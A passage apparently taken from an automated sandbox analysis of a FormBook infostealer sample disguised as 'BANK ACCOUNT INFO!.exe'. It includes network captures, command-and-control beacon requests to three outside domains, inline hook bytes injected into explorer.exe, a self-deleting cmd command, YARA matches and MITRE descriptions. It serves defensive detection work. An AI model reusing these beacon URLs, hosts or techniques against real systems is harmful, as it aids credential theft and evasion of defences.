Nov 20, 2020 12:02:29.229806900 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.229861975 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.229897976 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.229937077 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.229973078 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230020046 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230061054 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230098009 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230097055 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230137110 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230174065 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230210066 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230247021 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230273008 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230283976 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230331898 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230359077 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230374098 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230411053 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230433941 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230448961 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230485916 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230500937 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230520964 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230559111 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230573893 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230595112 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230640888 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230640888 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230683088 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230714083 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230717897 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230757952 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230794907 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230829954 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230865955 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230868101 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230902910 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230948925 CET	80	49746	198.49.23.141	192.168.2.3
Nov 20, 2020 12:02:29.230963945 CET	49746	80	192.168.2.3	198.49.23.141
Nov 20, 2020 12:02:29.230992079 CET	80	49746	198.49.23.141	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 12:00:44.891804934 CET	60831	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:44.918885946 CET	53	60831	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:45.685280085 CET	60100	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:45.712569952 CET	53	60100	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:46.870942116 CET	53195	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:46.898293972 CET	53	53195	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:47.661768913 CET	50141	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:47.689126968 CET	53	50141	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:48.511008978 CET	53023	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:48.538109064 CET	53	53023	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:49.400785923 CET	49563	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:49.427953005 CET	53	49563	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:53.098639011 CET	51352	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:53.125927925 CET	53	51352	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:53.788117886 CET	59349	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:53.815336943 CET	53	59349	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:54.571669102 CET	57084	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:54.598737955 CET	53	57084	8.8.8.8	192.168.2.3
Nov 20, 2020 12:00:55.371642113 CET	58823	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:00:55.398713112 CET	53	58823	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:09.166129112 CET	57568	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:09.193272114 CET	53	57568	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:14.728342056 CET	50540	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:14.766194105 CET	53	50540	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:31.285578966 CET	54366	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:31.321490049 CET	53	54366	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:31.832436085 CET	53034	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:31.859709978 CET	53	53034	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:32.317570925 CET	57762	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:32.353605032 CET	53	57762	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:32.685142994 CET	55435	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:32.738959074 CET	53	55435	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:33.052983046 CET	50713	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:33.088882923 CET	53	50713	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:33.105149984 CET	56132	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:33.140716076 CET	53	56132	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:33.557401896 CET	58987	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:33.584444046 CET	53	58987	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:34.034226894 CET	56579	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:34.069911003 CET	53	56579	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:34.771054983 CET	60633	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:34.817404032 CET	53	60633	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:35.659082890 CET	61292	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:35.694948912 CET	53	61292	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:36.109157085 CET	63619	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:36.145090103 CET	53	63619	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:45.591332912 CET	64938	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:45.641511917 CET	53	64938	8.8.8.8	192.168.2.3
Nov 20, 2020 12:01:47.331137896 CET	61946	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:01:47.371232986 CET	53	61946	8.8.8.8	192.168.2.3
Nov 20, 2020 12:02:06.192368031 CET	64910	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:02:06.266632080 CET	53	64910	8.8.8.8	192.168.2.3
Nov 20, 2020 12:02:19.072527885 CET	52123	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:02:19.099642038 CET	53	52123	8.8.8.8	192.168.2.3
Nov 20, 2020 12:02:20.986049891 CET	56130	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:02:21.013591051 CET	53	56130	8.8.8.8	192.168.2.3
Nov 20, 2020 12:02:28.661729097 CET	56338	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:02:28.701240063 CET	53	56338	8.8.8.8	192.168.2.3
Nov 20, 2020 12:02:49.403424025 CET	59420	53	192.168.2.3	8.8.8.8
Nov 20, 2020 12:02:49.464521885 CET	53	59420	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 20, 2020 12:01:45.591332912 CET	192.168.2.3	8.8.8.8	0x5223	Standard query (0)	www.friendlyksa.com	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:06.192368031 CET	192.168.2.3	8.8.8.8	0x2be2	Standard query (0)	www.ablehead.net	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:28.661729097 CET	192.168.2.3	8.8.8.8	0x24a	Standard query (0)	www.katrinarask.com	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:49.403424025 CET	192.168.2.3	8.8.8.8	0x10dd	Standard query (0)	www.wellnysdirect.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 20, 2020 12:01:45.641511917 CET	8.8.8.8	192.168.2.3	0x5223	Name error (3)	www.friendlyksa.com	none	none	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:06.266632080 CET	8.8.8.8	192.168.2.3	0x2be2	No error (0)	www.ablehead.net		107.22.223.163	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:28.701240063 CET	8.8.8.8	192.168.2.3	0x24a	No error (0)	www.katrinarask.com	ext-sq.squarespace.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 12:02:28.701240063 CET	8.8.8.8	192.168.2.3	0x24a	No error (0)	ext-sq.squarespace.com		198.49.23.141	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:28.701240063 CET	8.8.8.8	192.168.2.3	0x24a	No error (0)	ext-sq.squarespace.com		198.185.159.141	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:28.701240063 CET	8.8.8.8	192.168.2.3	0x24a	No error (0)	ext-sq.squarespace.com		198.49.23.141	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:28.701240063 CET	8.8.8.8	192.168.2.3	0x24a	No error (0)	ext-sq.squarespace.com		198.185.159.141	A (IP address)	IN (0x0001)
Nov 20, 2020 12:02:49.464521885 CET	8.8.8.8	192.168.2.3	0x10dd	No error (0)	www.wellnysdirect.com	welllnysdirect.wpengine.com		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 12:02:49.464521885 CET	8.8.8.8	192.168.2.3	0x10dd	No error (0)	welllnysdirect.wpengine.com		35.230.2.159	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.ablehead.net

www.katrinarask.com

www.wellnysdirect.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	107.22.223.163	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 12:02:06.373770952 CET	5114	OUT	GET /sbmh/?FPWlMXx=PcjUtjh0MRWP8BRvWG8NuUt69AEkHHHW5P4XnB/f7cjpZcBvzWU1+UolGZvfCul1Hwqj&AlO=O2JtmTIX2 HTTP/1.1 Host: www.ablehead.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 12:02:06.476324081 CET	5115	IN	HTTP/1.1 404 Not Found Date: Fri, 20 Nov 2020 11:02:06 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 62 6d 68 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sbmh/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49746	198.49.23.141	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 12:02:28.834657907 CET	5134	OUT	GET /sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2 HTTP/1.1 Host: www.katrinarask.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 12:02:28.968111038 CET	5136	IN	HTTP/1.1 400 Bad Request content-length: 77564 expires: Thu, 01 Jan 1970 00:00:00 UTC pragma: no-cache cache-control: no-cache, must-revalidate content-type: text/html; charset=UTF-8 connection: close date: Fri, 20 Nov 2020 11:02:28 UTC x-contextid: tMDq14yI/S50ZzEmY server: Squarespace Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49747	35.230.2.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2020 12:02:49.629297972 CET	5216	OUT	GET /sbmh/?FPWlMXx=+2tIfJwwghXNm+fysv8+EMC6xMyDXIpTEsDIQwPK5FpH6PGBMSGX6HHqgPLM/DeZI3NR&AlO=O2JtmTIX2 HTTP/1.1 Host: www.wellnysdirect.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 20, 2020 12:02:49.792768002 CET	5217	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 20 Nov 2020 11:02:49 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.wellnysdirect.com/sbmh/?FPWlMXx=+2tIfJwwghXNm+fysv8+EMC6xMyDXIpTEsDIQwPK5FpH6PGBMSGX6HHqgPLM/DeZI3NR&AlO=O2JtmTIX2 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE6
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE6
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE6
GetMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE6

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: BANK ACCOUNT INFO!.exe PID: 5264 Parent PID: 5652

General

Start time:	12:00:47
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe'
Imagebase:	0x480000
File size:	778240 bytes
MD5 hash:	0BD3E9073A968FD6C10C3B163302C2C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.214093011.00000000028F7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.213965097.00000000028B1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: BANK ACCOUNT INFO!.exe PID: 1708 Parent PID: 5264

General

Start time:	12:00:49
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe
Imagebase:	0x990000
File size:	778240 bytes
MD5 hash:	0BD3E9073A968FD6C10C3B163302C2C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3388 Parent PID: 1708

General

Start time:	12:00:51
Start date:	20/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: wscript.exe PID: 5884 Parent PID: 3388

General

Start time:	12:01:08
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wscript.exe
Imagebase:	0x8b0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: cmd.exe PID: 3216 Parent PID: 5884

General

Start time:	12:01:12
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 2212 Parent PID: 3216

General

Start time:	12:01:12
Start date:	20/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
